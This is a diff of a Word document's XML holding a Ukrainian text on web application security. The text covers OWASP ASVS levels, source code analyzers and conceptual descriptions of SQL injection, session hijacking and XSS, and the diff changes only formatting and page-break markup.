+        <w:t xml:space="preserve">ASVS Рівень 3 є високий рівень </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>контролю в межах рівня ASVS. Він, як правило, зарезервований</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> для додатків, що вимагають значних рівнів перевірки безпеки, таких, як ті</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:strike/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>, які можуть бути знайдені в районах військових, охорони здоров'я і безпеки, життєво важливої ​​інфраструктури і т.д. організацій може знадобитися ASVS 3-го</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> рівня для додатків, що виконують критично важливі функції, де збій може істотно вплинути на діяльність організації, і навіть її живучість. Приклад вказівки по застосуванню ASVS Level 3 представлена ​​нижче. Додаток досягає ASVS 3-го </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>рівня (або Advanced), якщо він адекватно захищає від передових вразливостей безпеки додатків, а також демонструє принципи хорошого дизайну безпеки.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7368,7 +7315,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>(Наприклад, обробка навантаження коректно), аутентифікацію (в тому числі між системами), безвідмовності, авторизацію і аудит (ведення журналу).</w:t>
       </w:r>
       <w:r>
@@ -8258,7 +8204,18 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>додаток є ідентифікованими</w:t>
+              <w:t xml:space="preserve">додаток є </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>ідентифікованими</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -8421,6 +8378,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>1.3</w:t>
             </w:r>
           </w:p>
@@ -9326,7 +9284,6 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>1.7</w:t>
             </w:r>
           </w:p>
@@ -10401,6 +10358,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Аутентифікація є актом встановлення або підтвердження, що щось (або хтось</w:t>
       </w:r>
       <w:r>
@@ -11255,18 +11213,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> що </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t>облікові дані зберігаютьс</w:t>
+              <w:t xml:space="preserve"> що облікові дані зберігаютьс</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11448,7 +11395,6 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>2.3</w:t>
             </w:r>
           </w:p>
@@ -12504,6 +12450,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>2.7</w:t>
             </w:r>
           </w:p>
@@ -13223,18 +13170,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> тому, що система може бути налаштована, щоб заборонити використання заданого </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t>кількості попередніх паролів.</w:t>
+              <w:t xml:space="preserve"> тому, що система може бути налаштована, щоб заборонити використання заданого кількості попередніх паролів.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -13386,7 +13322,6 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>2.11</w:t>
             </w:r>
           </w:p>
@@ -14237,6 +14172,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>2.15</w:t>
             </w:r>
           </w:p>
@@ -14887,7 +14823,6 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Переконайтеся в тому, що перевірений додаток задовольняє наступні вимоги управління сеансами високого рівня:</w:t>
       </w:r>
     </w:p>
@@ -16243,6 +16178,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>3.5</w:t>
             </w:r>
           </w:p>
@@ -17022,7 +16958,6 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t xml:space="preserve">цим </w:t>
             </w:r>
             <w:r>
@@ -17186,7 +17121,6 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>3.9</w:t>
             </w:r>
           </w:p>
@@ -18604,6 +18538,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>4.4</w:t>
             </w:r>
           </w:p>
@@ -19879,7 +19814,6 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>звичайних атак</w:t>
             </w:r>
             <w:r>
@@ -20102,7 +20036,6 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>4.9</w:t>
             </w:r>
           </w:p>
@@ -20918,6 +20851,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>4.12</w:t>
             </w:r>
           </w:p>
@@ -21648,54 +21582,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -21707,7 +21593,6 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>V</w:t>
       </w:r>
       <w:r>
@@ -22957,7 +22842,18 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> належним чином.</w:t>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>належним чином.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -23109,6 +23005,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>5.5</w:t>
             </w:r>
           </w:p>
@@ -23744,7 +23641,6 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Класифікація аналізаторів вихідного коду</w:t>
       </w:r>
     </w:p>
@@ -24150,7 +24046,18 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> коду знаходять проблеми і потенційно вразливі місця в початкових кодах і видають рекомендації для їх усунення. Варто зазначити, що більшість з аналізаторів </w:t>
+        <w:t xml:space="preserve"> коду знаходять проблеми і потенційно вразливі місця в початкових кодах і видають рекомендації для їх усунення. Варто </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">зазначити, що більшість з аналізаторів </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -24194,18 +24101,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ізні механізми аналізу, але найбільш поширеним і універсальним є статичний аналіз вихідного коду - SAST (Static Application Security Testing), також існують методи динамічного аналізу - DAST (Dynamic Application Security Testing), що виконують перевірки коду при його виконанні, і різні гібридні варіанти, що поєднують різні типи аналізів. Динамічний аналіз є самостійним методом перевірки, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>який може розширювати можливості статичного аналізу або застосовуватися самостійно в тих випадках, коли дос</w:t>
+        <w:t>ізні механізми аналізу, але найбільш поширеним і універсальним є статичний аналіз вихідного коду - SAST (Static Application Security Testing), також існують методи динамічного аналізу - DAST (Dynamic Application Security Testing), що виконують перевірки коду при його виконанні, і різні гібридні варіанти, що поєднують різні типи аналізів. Динамічний аналіз є самостійним методом перевірки, який може розширювати можливості статичного аналізу або застосовуватися самостійно в тих випадках, коли дос</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -24324,7 +24220,18 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>ітом, що відбивається в базах вразливостей аналізаторів. Велика частина аналізаторів, представлених на ринку, виконує функції обох класів, однаково добре перевіряючи як вбудовується в бізнес-додатки код, так і код веб-додатків. Вхідними даними для аналізатора вихідного коду є масив вихідних текстів програм і його залежностей (</w:t>
+        <w:t xml:space="preserve">ітом, що відбивається в базах вразливостей аналізаторів. Велика частина аналізаторів, представлених на ринку, виконує функції обох класів, однаково добре перевіряючи як вбудовується в бізнес-додатки код, так і код веб-додатків. Вхідними даними для аналізатора вихідного коду є масив вихідних текстів програм і його залежностей </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>(</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -24409,7 +24316,6 @@
           <w:noProof/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5940425" cy="2083489"/>
@@ -24602,7 +24508,18 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">івняльних тестах. Державні бази помилок програмування - існує ряд державних баз вразливостей, складанням і </w:t>
+        <w:t xml:space="preserve">івняльних тестах. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Державні бази помилок програмування - існує ряд державних баз вразливостей, складанням і </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -24657,18 +24574,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">Дані документи безпосередньо не описують помилки програмування, на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>відміну від CWE, але містять перелік методів, які можуть бути перетворені для використання в статичному аналізаторі вихідного коду.</w:t>
+        <w:t>Дані документи безпосередньо не описують помилки програмування, на відміну від CWE, але містять перелік методів, які можуть бути перетворені для використання в статичному аналізаторі вихідного коду.</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -25078,6 +24984,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
@@ -25327,7 +25234,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>П</w:t>
       </w:r>
       <w:r>
@@ -25512,7 +25418,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+          <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -25639,9 +25545,9 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> OWASP Top 10 </w:t>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -25651,9 +25557,9 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>є</w:t>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>OWASP</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -25663,7 +25569,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+          <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -25675,9 +25581,9 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>кращою</w:t>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Top</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -25687,9 +25593,9 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 10 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -25701,7 +25607,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>практикою</w:t>
+        <w:t>є</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -25711,7 +25617,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+          <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -25725,7 +25631,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>усунення</w:t>
+        <w:t>кращою</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -25735,7 +25641,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+          <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -25749,7 +25655,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>вразливостей</w:t>
+        <w:t>практикою</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -25759,9 +25665,81 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>усунення</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>вразливостей</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Web-</w:t>
+        <w:t>Web</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>-</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -25854,7 +25832,19 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Ін’єкція коду завжди була однією з найбільш значущих і поширених вразливостей Web-додатків, тому не дивно, що цей тип вразливостей займає верхню строчку списку OWASP. Існує безліч різновидів цієї уразливості, але до сих пір самою сумнозвісною з них є ін’єкція SQL-коду. Вона успішно використовується хакерами протягом більше десяти років. SQL ін'єкція полягає в тому, що зловмисник вводить SQL-команди в поле введення. Якщо код Web-додатка не відфільтровує дані, то на Web-сервері можна запустити SQL-команди і виконувати прямі запити до внутрішньої бази даних в обхід мережевих засобів захисту. Шляхом впровадження SQL-коду зловмисник може дістати таблиці з даними, змінити записи в таблицях і навіть повністю видалити базу даних.</w:t>
+        <w:t xml:space="preserve">Ін’єкція коду завжди була однією з найбільш значущих і поширених вразливостей Web-додатків, тому не дивно, що цей тип вразливостей займає верхню строчку списку OWASP. Існує безліч різновидів цієї уразливості, але до сих пір самою сумнозвісною з них є ін’єкція SQL-коду. Вона успішно використовується хакерами протягом більше десяти років. SQL ін'єкція полягає в тому, що зловмисник вводить SQL-команди в поле введення. Якщо код Web-додатка не відфільтровує дані, то на Web-сервері можна запустити </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>SQL-команди і виконувати прямі запити до внутрішньої бази даних в обхід мережевих засобів захисту. Шляхом впровадження SQL-коду зловмисник може дістати таблиці з даними, змінити записи в таблицях і навіть повністю видалити базу даних.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25960,7 +25950,6 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Зловмисник може спробувати вкрасти (несанкціоновано використовувати) Web-сеанс користувача, дізнавшись його секретний ідентифікатор. Знаючи секретний ідентифікатор сеансу, атакуючий може представитися Web-серверу аутентиф</w:t>
       </w:r>
       <w:r>
@@ -26106,7 +26095,19 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Міжсайтовий скриптинг (cross-site scripting, XSS) - це ще один різновид атаки на Web-додатки, що зберігає популярність вже багато років. Якщо Web-додаток містить XSS-уразливість, то зловмисник може впровадити на Web-сторінку шкідливий сценарій, що виконується при завантаженні сторінки користувачем.</w:t>
